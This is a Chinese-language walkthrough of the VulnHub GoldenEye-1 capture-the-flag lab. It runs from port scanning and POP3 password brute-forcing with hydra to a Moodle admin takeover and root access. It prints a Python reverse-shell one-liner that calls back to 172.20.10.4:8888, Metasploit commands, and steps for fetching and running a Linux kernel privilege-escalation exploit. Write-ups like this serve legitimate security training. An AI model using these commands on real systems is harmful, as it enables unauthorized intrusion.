在本地监听8888端口
title: Vulnhub-GlodenEye-1 categories: - VulnHub tags: - Linux - nmap - gobuster - JavaScript - html - POP3 - 邮件 - hydra - 密码爆破 - exiftool - strings - Moodle - RCE - searchsploit - metasploit - 域名解析 cover: /images/Vulnhub.png abbrlink: 71172b32
0x01 靶机介绍
- Name: GoldenEye: 1
- Date release: 4 May 2018
- Author: creosote
- Series: GoldenEye
- Description : The goal is to get root and capture the secret GoldenEye codes - flag.txt.
靶机下载地址:
https://www.vulnhub.com/entry/goldeneye-1,240/
0x02 侦查
端口探测
首先使用 nmap 进行端口扫描
nmap -p- -sV -sC -A 192.168.0.103 -oA nmap_GlodenEye-1
扫描结果显示目标开放了25、80、55006和55007端口
80端口
访问http://192.168.0.103提示存在/sev-home目录可登录
访问http://192.168.0.103/sev-home/出现登录界面
目录扫描
使用 gobuster 进行目录扫描未发现可用目录或文件
gobuster dir -u http://192.168.0.103 -w /usr/share/wordlists/dirb/big.txt
0x03 上线[www-data]
信息收集
查看网页源代码发现 JavaScript 文件terminal.js
访问http://192.168.0.103/terminal.js源码如下:
var data = [ { GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>" }];////Boris, make sure you update your default password. //My sources say MI6 maybe planning to infiltrate. //Be on the lookout for any suspicious network traffic....////I encoded you p@ssword below...////InvincibleHack3r////BTW Natalya says she can break your codes//var allElements = document.getElementsByClassName("typeing");for (var j = 0; j < allElements.length; j++) { var currentElementId = allElements[j].id; var currentElementIdContent = data[0][currentElementId]; var element = document.getElementById(currentElementId); var devTypeText = currentElementIdContent; var i = 0, isTag, text; (function type() { text = devTypeText.slice(0, ++i); if (text === devTypeText) return; element.innerHTML = text + `<span class='blinker'> </span>`; var char = text.slice(-1); if (char === "<") isTag = true; if (char === ">") isTag = false; if (isTag) return type(); setTimeout(type, 60); })();}
针对注释中 HTML 编码的字符进行解码,同时找到用户名Boris、Natalya
InvincibleHack3r#解码后InvincibleHack3r
邮件服务
利用账号密码boris/InvincibleHack3r成功登录,根据提示需针对目标的 POP3 邮件服务
目标的55007端口为 POP3 邮件服务
使用 hydra 以收集到的账号配合密码字典爆破 POP3 服务
hydra 192.168.0.103 -s 55007 pop3 -L user.txt -P /usr/share/wordlists/fasttrack.txt -v
成功拿到两个账号密码
natalya/birdboris/secret1!
登录natalya账号查看邮件内容
nc 192.168.0.103 55007nc > user natalyanc > pass birdnc > listnc > retr 1nc > retr 2nc > retr ...nc > quit
其中两封邮件内容如下:
## 第一封Return-Path: <root@ubuntu>X-Original-To: natalyaDelivered-To: natalya@ubuntuReceived: from ok (localhost [127.0.0.1]) by ubuntu (Postfix) with ESMTP id D5EDA454B1 for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)Message-Id: <20180425024542.D5EDA454B1@ubuntu>Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)From: root@ubuntuNatalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.## 第二封Return-Path: <root@ubuntu>X-Original-To: natalyaDelivered-To: natalya@ubuntuReceived: from root (localhost [127.0.0.1]) by ubuntu (Postfix) with SMTP id 17C96454B1 for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)Message-Id: <20180425031956.17C96454B1@ubuntu>Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)From: root@ubuntusearchsploitOk Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)Ok, user creds are:username: xeniapassword: RCP90rulez!Boris verified her as a valid contractor so just create the account ok?And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir**Make sure to edit your host file since you usually work remote off-network....Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.
登录boris账号查看邮件内容
nc 192.168.0.103 55007nc > user borisnc > pass secret1!nc > listnc > retr 1nc > retr 2nc > retr ...nc > quit
两封邮件的内容如下:
## 第一封Return-Path: <[email protected].goldeneye>X-Original-To: borisDelivered-To: boris@ubuntuReceived: from ok (localhost [127.0.0.1]) by ubuntu (Postfix) with SMTP id D9E47454B1 for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)Message-Id: <20180425022326.D9E47454B1@ubuntu>Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)From: [email protected], this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.## 第二封Return-Path: <natalya@ubuntu>X-Original-To: borisDelivered-To: boris@ubuntuReceived: from ok (localhost [127.0.0.1]) by ubuntu (Postfix) with ESMTP id C3F2B454B1 for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)Message-Id: <20180425024249.C3F2B454B1@ubuntu>Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)From: natalya@ubuntuBoris, I can break your codes!## 第三封Return-Path: <[email protected]>X-Original-To: borisDelivered-To: boris@ubuntuReceived: from janus (localhost [127.0.0.1]) by ubuntu (Postfix) with ESMTP id 4B9F4454B1 for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)Message-Id: <20180425025235.4B9F4454B1@ubuntu>Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)From: [email protected],Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....PS - Keep security tight or we will be compromised.
分析邮件后成功找到账号密码xenia/RCP90rulez!,同时在本地设置域名解析
192.168.0.103 severnaya-station.com
访问http://severnaya-station.com/gnocertdir界面如下
通过xenia/RCP90rulez!成功登录
在My profile》Messages中找到 Dr Doak 用户的邮件
邮件内容如下:
09:24 PM: Greetings Xenia,As a new Contractor to our GoldenEye training I welcome you. Once your account has been complete, more courses will appear on your dashboard. If you have any questions message me via email, not here.My email username is...doakThank you,Cheers,09:24 PM: Greetings Xenia,As a new Contractor to our GoldenEye training I welcome you. Once your account has been complete, more courses will appear on your dashboard. If you have any questions message me via email, not here.My email username is...doakThank you,Cheers,Dr. Doak "The Doctor"Training Scientist - Sr Level Training Operating SupervisorGoldenEye Operations Center SectorLevel 14 - NO2 - id:998623-1334Campus 4, Building 57, Floor -8, Sector 6, cube 1,007Phone 555-193-826Cell 555-836-0944Office 555-846-9811Personal 555-826-9923Email: doak@Please Recycle before you print, Stay Green aka save the company money!"There's such a thing as Good Grief. Just ask Charlie Brown" - someguy"You miss 100% of the shots you don't shoot at" - Wayne G.THIS IS A SECURE MESSAGE DO NOT SEND IT UNLESSDr. Doak "The Doctor"Training Scientist - Sr Level Training Operating SupervisorGoldenEye Operations Center SectorLevel 14 - NO2 - id:998623-1334Campus 4, Building 57, Floor -8, Sector 6, cube 1,007Phone 555-193-826Cell 555-836-0944Office 555-846-9811Personal 555-826-9923Email: doak@Please Recycle before you print, Stay Green aka save the company money!"There's such a thing as Good Grief. Just ask Charlie Brown" - someguy"You miss 100% of the shots you don't shoot at" - Wayne G.THIS IS A SECURE MESSAGE DO NOT SEND IT UNLESS
由于存在doak账户,使用 hydra 再次爆破密码,成功拿到对应密码为goat
hydra 192.168.0.103 -s 55007 pop3 -l doak -P /usr/share/wordlists/fasttrack.txt -v
nc 192.168.0.103 55007nc > user doaknc > pass goatnc > listnc > retr 1nc > quit
利用账号密码dr_doak/4England!可登录网站页面,其中s3ret.txt内容如下:
007,I was able to capture this apps adm1n cr3ds through clear txt. Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here. Something juicy is located here: /dir007key/for-007.jpgAlso as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
下载后通过strings命令或exiftool获取图片信息
strings for-007.jpgexiftool for-007.jpg
成功找到一串 Base64 字符编码:eFdpbnRlcjE5OTV4IQ==
经解码后为xWinter1995x!
echo "eFdpbnRlcjE5OTV4IQ==" | base64 -d## 解码后 xWinter1995x!
通过账号密码admin/xWinter1995x!成功登录管理员
exploit-db 中存在相关的利用代码,具体代码位于https://www.exploit-db.com/exploits/29324
当然也可以使用 searchsploit 搜索 Moodle 中存在的漏洞
在Settings》site administration〉Server》System paths中找到Path to aspell,在其中写入反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.20.10.4",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
在本地监听8888端口
nc -nvlp 8888在Home》My profile》Blogs》Add a new entry中新建博客,点击Toggle Spellchecker后成功拿到反弹shell
通过 Python 切换 pty
python -c 'import pty;pty.spawn("/bin/bash")'
msfconsolemsf> use exploit/multi/http/moodle_cmd_execmsfexploit(moodle_cmd_exec) > show optionsmsfexploit(moodle_cmd_exec) > set password xWinter1995x!msfexploit(moodle_cmd_exec) > set rhosts severnaya-station.commsfexploit(moodle_cmd_exec) > set targeturi /gnocertdirmsfexploit(moodle_cmd_exec) > run
但是本机未拿到会话,而 Kali 2018 中使用 payload 可以拿到shell
0x04 权限提升[root]
信息收集
查看系统内核版本为 Ubuntu 3.13.0
uname -a使用 searchsploit 搜索相关提权脚本
searchsploit ubuntu 3.13.0
cp /usr/share/exploitdb/exploits/linux/local/37292.c ./通过 gcc 编译 EXP
gcc 37292.c -o exp
在本地开启 http 服务
python -m SimpleHTTPServer 80下载该 EXP 并赋予执行权限
wget http://172.20.10.4/expchmod777exp
执行 EXP 失败,提示缺少 gcc
./exp
因此需要把源码中的 gcc 修改为 cc 后再进行编译
cc 37292.c -o ex
再次执行成功提权为 root 用户
成功找到 flag,提示 flag 位于 web 目录下
cd/rootls-lacat.flag.txt
访问http://172.20.10.2/006-final/xvf7-flag成功拿到flag
原文始发于微信公众号(狐狸说安全):Vulnhub GlodenEye-1
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论